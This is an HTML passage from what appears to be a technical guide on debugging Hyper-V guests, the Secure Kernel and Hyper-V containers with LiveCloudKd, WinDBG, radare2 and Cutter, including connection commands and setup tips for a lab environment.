font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 272px; overflow: hidden; width: 290px;"><img height="272" src="https://lh5.googleusercontent.com/dbNgis6klQS7hr0mytDcGUzCjWx53znvtfZ-_R3EBggH_mhfOhJlaQfhbWwwQhjlv2mEDnvz4iybNBwMji5DeZo__IQo9XT061vJnQXNESP21mVEoe03acKT01Z02sLpauhT0xDjXFd-Sx4n_A" style="margin-left: 0px; margin-top: 0px;" width="290" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can run example.exe inside the guest VM:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 
157px; overflow: hidden; width: 301px;"><img height="157" src="https://lh6.googleusercontent.com/xg6HLawHjnYlEbgRpbjwmIka-GrqHK-B8qiefK_EXnOCC4OiJCtUXfF4DSShruSAaMmSHCmhkaXWfrLAUd-RzrL0Gw8A5fFjagSEsHr-8G2oj-3mR32_7n-ySJxskUIep1sYxgb77Haq58nJFg" style="margin-left: 0px; margin-top: 0px;" width="301" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We will probably see more examples in future.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.7.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Securekernel debugging</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The LiveCloudKd EXDi module can be used for debugging a Hyper-V guest OS without enabling kernel debugging in the bootloader. Instructions are available on the module page:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><a href="https://github.com/gerhart01/LiveCloudKd/blob/master/ExdiKdSample/LiveDebugging.md" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd/blob/master/ExdiKdSample/LiveDebugging.md</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Another method was described by @commial:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b 
style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><a href="https://github.com/commial/experiments/tree/master/debugging-secure-kernel" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/commial/experiments/tree/master/debugging-secure-kernel</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.8.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hyper-V container debugging</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" 
style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The LiveCloudKd EXDi plugin can be used too, but it is better to switch the Hyper-V scheduler to classic:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set hypervisorschedulertype classic</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Debugging instructions can be found at</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><a href="https://github.com/gerhart01/LiveCloudKd/blob/master/ExdiKdSample/LiveDebugging.md" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; 
text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/LiveCloudKd/blob/master/ExdiKdSample/LiveDebugging.md</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.9.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Radare2 debugging</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Radare2 is an interesting console-style debugging platform. 
You can download the latest binaries from </span><a href="https://github.com/radareorg/radare2/releases" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/radareorg/radare2/releases</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">but to get additional information about Hyper-V you need to recompile it (it is easy). 
Compilation instructions are at</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><a href="https://radare.gitbooks.io/radare2book/content/first_steps/windows_compilation.html" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://radare.gitbooks.io/radare2book/content/first_steps/windows_compilation.html</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Using radare2 and WinDBG:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><a href="https://radare.gitbooks.io/radare2book/content/debugger/windbg.html" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://radare.gitbooks.io/radare2book/content/debugger/windbg.html</span></a></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><a 
href="https://book.rada.re/debugger/windbg.html" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://book.rada.re/debugger/windbg.html</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt; text-indent: 34.8pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Those are good instructions. Before running, don’t forget to set _NT_DEBUGGER_EXTENSION_PATH to the WinDBG x64 dir and copy the extensions to the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">radare2</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> bin folder: </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ext.dll</span></p><p 
dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">exts.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">kdexts.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">kext.dll</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">radare2 commands for testing:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">pd</span><span face="Calibri,sans-serif" 
style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – disassemble</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">xq</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> @0x&lt;address&gt; – display memory content</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">v</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> – switch to GUI mode</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There are two radare2 modes for connecting to Windows kernel debugging: the dbgeng.dll interface and its own winkd protocol implementation.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 
0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 36pt; text-align: center; text-indent: -36pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.9.1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Radare2 + WinDBG dbgeng.dll interface</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Configure the hypervisor in network debugging mode and run radare2 with these parameters:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; 
font-weight: 700; text-decoration: none; vertical-align: baseline;">radare2 -d "windbg://-k net:port=50011,key=1.2.3.4"</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 308px; overflow: hidden; width: 583px;"><img alt="Image" height="308" src="https://lh4.googleusercontent.com/KQ6WhZfrLcBHPnZMc3RtOXLVts2Jldo9vxwYz73AzaGVEovYnq99gFcoRHjun6_Q1SwVLaWM3gze0iPnY58BWEkeaYwYwT0zKV7ndR4rjI16cmdL5Ynmq03VmNM8LB6P9QdxDsuyOWPgtAoxDQ" style="margin-left: 0px; margin-top: 0px;" width="583" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can execute standard WinDBG commands using the =! 
prefix.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 117px; overflow: hidden; width: 302px;"><img height="117" src="https://lh3.googleusercontent.com/WkF-dfqwQ_3csFgHpzAvSRYcRNZeFKB3h79Ut_n2N4uT0bflWwHk2HvzzgiAOi2YOb50oQcjpBcF4HN0S9FRQJPz2TgojcYCqWA15ACnOPv35HazljKiguK1QneQSGqpA6oCl0ESMFfHeAuG8g" style="margin-left: 0px; margin-top: 0px;" width="302" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 36pt; text-align: center; text-indent: -36pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.9.2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Radare2 + embedded winkd extension</span></p><p dir="ltr" style="line-height: 1.295; 
margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">radare2 -D winkd winkd://192.168.174.1:50011:1.2.3.4</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I got an error while opening the UDP socket. 
Probably it is some mistake in my lab, but you can try it in your environment.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Connect to Hyper-V using COM debugging through the vmdemux pipe:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">radare2 -D winkd winkd://\\.\pipe\Vm0</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Using the debugging protocol, you get additional information about Hyper-V:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" 
style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 258px; overflow: hidden; width: 557px;"><img height="258" src="https://lh3.googleusercontent.com/HxsHX9K3fHItG5wdlwNzTwofsDvOgbASXPMUSUrbmJpX3gij2qBomXep9GNJ4DCu7VbSQ7xPi6qDDzWy_R8gc-F3kHL4x9vSXtcc7YdynluoGLgCbOQz8ALbuwpfPx-vYz6TKb4qfkMMe5BCCQ" style="margin-left: 0px; margin-top: 0px;" width="557" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The Kd protocol changes sometimes. 
If you get hangs or errors, first try to make a connection using the standard WinDBG debugger through the COM port, then disconnect and attach radare2.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 36pt; text-align: center; text-indent: -36pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.9.3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Cutter</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Cutter is a GUI frontend for </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">radare2</span><span face="Calibri,sans-serif" style="background-color: 
transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> with interesting debugging capabilities, but it is in beta stage. It has an integrated Ghidra decompiler, so it can be very useful. Cutter supports GDB and WinDBG-pipe debugging options now.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 36pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 184px; overflow: hidden; width: 532px;"><img height="184" src="https://lh3.googleusercontent.com/fkuntIDf1dQaNSd2Jxv0aEwGGvzYy3hsj5i3Z7S97yfd2gt9ZrVStUtjSUN4ETDhY-tL29b253240_3cpT4l03nTDEGiFEbynVlg80nUDqzUemC6HF-juIfF4LQi_hei8WfWpLS4sNxgmlPE0w" style="margin-left: 0px; margin-top: 0px;" width="532" /></span></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; 